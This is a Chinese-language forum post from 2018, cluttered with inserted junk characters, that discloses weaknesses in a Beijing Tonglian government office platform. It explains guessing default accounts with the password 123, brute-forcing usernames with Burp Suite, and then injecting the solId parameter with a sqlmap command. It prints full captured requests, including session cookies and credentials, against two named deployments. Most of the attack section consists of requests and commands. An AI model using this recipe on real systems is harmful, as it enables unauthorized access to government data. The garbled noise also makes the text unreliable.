|
/ J d6 {; y$ I# Y, S( u" o9 y* @
+ q) c' q' r4 p2 i* r
3 B/ k) R/ }9 P J h
) r0 d1 T% c8 s3 \ 平台简介:
) S M: f% H1 K( A, G& m% O/ y
8 q* b% l- Y: }! _( T. D0 ? x/ O* O. p8 i( J9 J5 J$ H" B
, B; O2 b7 x1 e0 d6 t+ G/ u
! Z" C9 h) h; H& [
8 G5 {( e( j4 j8 d# e, x 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
: R. d. M: C8 Z" z# g9 E, i同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
: n+ l) B% x9 o; L4 b同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!% r3 B4 h9 V# i2 Y" e9 ?6 k+ k
0 U% ?; J' u% A% k, y& X% E5 R2 R
/ k) i: P$ ?! U5 [
3 ^" n/ J" j" ~' i* u$ Q- o! L : n: Y; e/ ^/ b7 m! {+ F
. ~4 J, j; d, o# J, Q 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:; s5 m7 ~7 Q/ u, x- d3 r$ j
, l2 u! e4 V+ W2 g8 d3 v
! C# R! p6 N) q2 s g- A- w' p / Q/ v( [6 T9 e) ^
9 s$ ~% @# W! y7 \ | K
6 {$ ] a7 ~6 K http://1.1.1.1:7197/cap-aco/#(案例2-)8 `" _$ J' @6 y0 Q& `
2 ~! S9 ~) z I; m
3 G+ O- X8 F+ l2 F- @: E9 i http://www.XXOO.com (案例1-官网网站)
% p2 _: J: t/ T& @
( w9 A$ F h- p; g; Z) W! u
4 n( a4 p; x. @ 6 P7 r2 w9 x) b3 }) W: P
; a1 `: b7 X# x0 P1 U$ Q
, U' d2 D. d4 x, i
漏洞详情:8 I! B( t. x8 d5 w) v" Z
6 T) h5 W; j; m* k
/ ~- p3 `% }4 y* A& q" I
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试
f9 H- d! O' O0 i F5 P# R
5 `; d" t: z& z( M0 j, a1 O
2 a, Y8 N& W! H 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
2 w4 U ]: W; b. l' v. d" l
3 g w H8 O# @8 N3 y" t" |7 {1 `1 T! f9 g' w! w0 Z* ~. z
% P0 S0 R* }4 ~+ q
2 P) z& m0 Z4 ]5 E( F6 [6 |0 ^; q6 N& L3 \# Y
 , D3 z& `+ n9 S1 h" E% a
( L6 T a; n: j3 ]+ ^
% H5 V6 D; Q5 v+ R" u( ?& o$ X
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
. g. `9 M/ u) X+ F1 s3 |# w. x0 A / x! P# E% o" K4 m. O) t
) J7 `+ {" f( U7 ~ 1、案例1-官方网站
- |6 w: B0 c; z- P 1 e: n: c7 Y$ R5 }$ u& c% F" ~0 U
$ R/ l; [# {* K% [ GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1 ?" H- x5 K! V, ^1 `3 ^
% G% Z& I. Z5 w
" a5 R8 s3 C6 z- p& j
Host: www.XXOO.com! O6 o. P# F3 c9 r$ ]
7 m- f1 i; X# j- Q
7 L* b: w7 w, A& b6 H/ ] Proxy-Connection: Keep-Alive
! x% F: j) i7 C/ H# o3 Y2 i/ |0 Z& }
0 p P/ _& z- k: x% `/ Q) ?& C5 a- G' B9 K6 `
Accept: application/json, text/javascript, */*; q=0.01
' C- {3 _7 S+ ?/ a# l8 P / Y( k" g1 f, ?6 \
. O* m- e& P% W) l1 Y) [/ Z
Accept-Language: zh-CN
6 K( t2 K1 \7 k
) N( P4 L& U$ Z: [% |. J
: {- Y. A" z: z1 H) X. G9 N Content-Type: application/json+ x2 l$ a. x, A9 Y; c1 {0 F2 F
4 v: p& P& B I$ }+ b5 y2 Q
4 U/ |; M0 }$ |! N2 C9 g _ User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko' Q* J6 i5 ~8 C) d2 M5 |
4 c* A8 g5 x; S. C* N! o6 y& e0 d! x5 c* p! G2 s
X-Requested-With: XMLHttpRequest7 m `9 w! Z6 f, T* }% f
+ V" _% c5 U8 b8 X# _* q3 c3 V. Q9 A; I* H1 ?( t5 p
Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002) o* M6 _ |- w
! t8 p1 j/ }1 ^6 G, T/ y
3 q" k: p! o) ?9 o. D8 k8 I
Accept-Encoding: gzip, deflate, sdch
& l. `9 n; D* S# ? # q- {6 T, r5 X" ^& l6 ^( s% n
4 b% X r/ G+ n2 f8 D
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e3 O4 ^2 w E1 s, i0 Z
0 `( ?* J$ \5 |8 {! z% F/ S H' q0 r& ^6 i6 ]; F- F& M
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
+ z% ]9 {, X/ O/ P$ w: { ( q; b! j' g( `/ r. e
. r+ m# M2 ]+ n) A
* h: z L+ ^8 M/ r0 ]
. b2 \5 ^' ~& C/ y
$ z! c. i; H- s C 
5 F" S; I" b5 S, b- N1 p) N
5 j; e4 G! U- {/ T( w. p) m O- `! K
8 K$ B5 F3 x4 m) S u+ E+ T+ K: |
+ C( V4 T6 q4 v
$ c! G, F$ T- p/ f# h- E& Y% z: l
5 q y9 T- q) x2 @
& y# n/ r7 H) n J8 S
, ? C( ~1 o; V, H5 A! l) W / g. }0 R3 H: j" h2 m
0 `' @6 r. o$ Q# |; u2 d3 _" d
8 r8 L2 P9 v1 Z1 { 2、案例2-某天河云平台
* Q7 X* `( @6 O
# _; G, C5 M$ Z7 N. Z, q: ~1 x) Y) D' C9 `9 {% i ?
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1. P, M& Q2 R+ j8 G: i* E0 |
6 K' Y& E3 Q; f4 |( ?1 l
9 {' w2 [4 z4 K
Host: 1.1.1.:7197+ o6 y* E r: m
$ |, q& T8 Z/ N3 | Y# s- T: T% P/ d, d3 Q j: h0 K/ G8 T
Accept: application/json, text/javascript, */*; q=0.01
5 K5 I( G$ P- P: g
! \+ e" E; `- [' a+ b" M8 A9 v4 V6 c b
X-Requested-With: XMLHttpRequest
9 \/ {+ Q/ @" D; [5 ~# ~* J- { 3 H- E. A+ r0 W, s/ \
% Q! |0 p/ [% x- A/ d4 }
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0, D5 G: [& E# n. m
( S# U- b m L- ? B5 G" ?7 m" U" t' z) O: p
Content-Type: application/json
6 t6 a' O/ e/ a: K @3 t! U* N7 n* J# E! X1 }
& Z! K8 A# F) `$ }' X! C8 g Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=10089 @. n5 n0 g% v+ W& W& e$ c% X
2 J# M. q' ~9 z) J3 w: M B+ d9 i: l$ P( b
Accept-Language: zh-CN,zh;q=0.84 O# {# o+ k* Y" g. ]3 ^
) X6 F& P/ t& n8 q' \% f
( _* A/ X0 @0 @* @) M' C Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1/ r& j) g2 Q$ l; p, ^" \
/ e7 w/ m, l' k, M" B& C5 p0 S+ }) u' I% b ~) ]: q* F& V$ C5 k
Connection: close8 {! o0 C0 K) Q) G, @- O) ~
3 W, X# C, E3 V" R$ n6 _. ~2 x
, c8 N/ }4 {+ h, {7 G, N+ ~4 A: Z 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:* u4 |9 }0 I- C, ~. G
; b! u( [0 B% ?* O' p
, e X+ y1 B9 R* `8 o* t& h" a  , k8 Q4 e4 U5 N' y, u
+ L6 R3 L' ]! w$ J9 [/ x, |
" \$ L, P3 R6 R
$ L# d* F$ W B2 {" t Y | 
发表于 2018-10-20 20:15:17
收藏
支持
反对